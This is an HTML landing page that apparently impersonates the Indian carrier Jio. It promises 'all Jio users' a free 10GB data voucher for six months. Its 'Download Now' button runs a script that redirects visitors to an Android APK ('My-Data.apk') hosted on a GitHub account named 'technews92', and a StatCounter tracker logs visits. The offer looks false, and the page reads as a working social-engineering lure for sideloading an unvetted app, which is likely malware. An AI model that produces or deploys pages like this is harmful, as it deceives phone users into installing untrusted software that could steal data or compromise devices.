<script type="text/javascript">
var sc_project=12873593; 
var sc_invisible=1; 
var sc_security="6afcb08a"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img
class="statcounter"
src="https://c.statcounter.com/12873593/0/6afcb08a/1/"
alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>

<html
    
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<head>
    <Title>Download</Title>
    <style>
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }

.clickss {
	background-color:#3c5fd0;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #fff;
}
.clickss:hover {
	background-color:#3c5fd0;
}
.selectts {
	background-color:#3c5fd0;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #;
}
.clickss:active {
	position:relative;
	top:1px;
}

    </style>
</head>
<script>
function done() 
{
    var m = new Date().getMinutes(); 
	if(m<30)
	{
		window.location="https://github.com/technews92/claim/blob/main/My-Data.apk?raw=true"; 
	}

	else
	{
		window.location="https://github.com/technews92/claim/blob/main/My-Data.apk?raw=true";
	}
}
</script>
<body>
<center>
    
	<img src="https://i.postimg.cc/QxQk8rKj/oie-UQE6-Ld7-Rz-Tqp.png"  height="100"/><br><br>
    
	<i></i><b></b><h2 style="color:black">Jio Data</h2><h3 style="color: black;">
	Jio is giving free 10GB Data Voucher<br>
	to all Jio Users for 6-MONTHS.<br>
Claim yours now.<br><br>
Data voucher available on New Jio app.</h3></b></i>
        <div onclick="done()"  class="clickss">Download Now</a>

    </div>
</center>
</html>
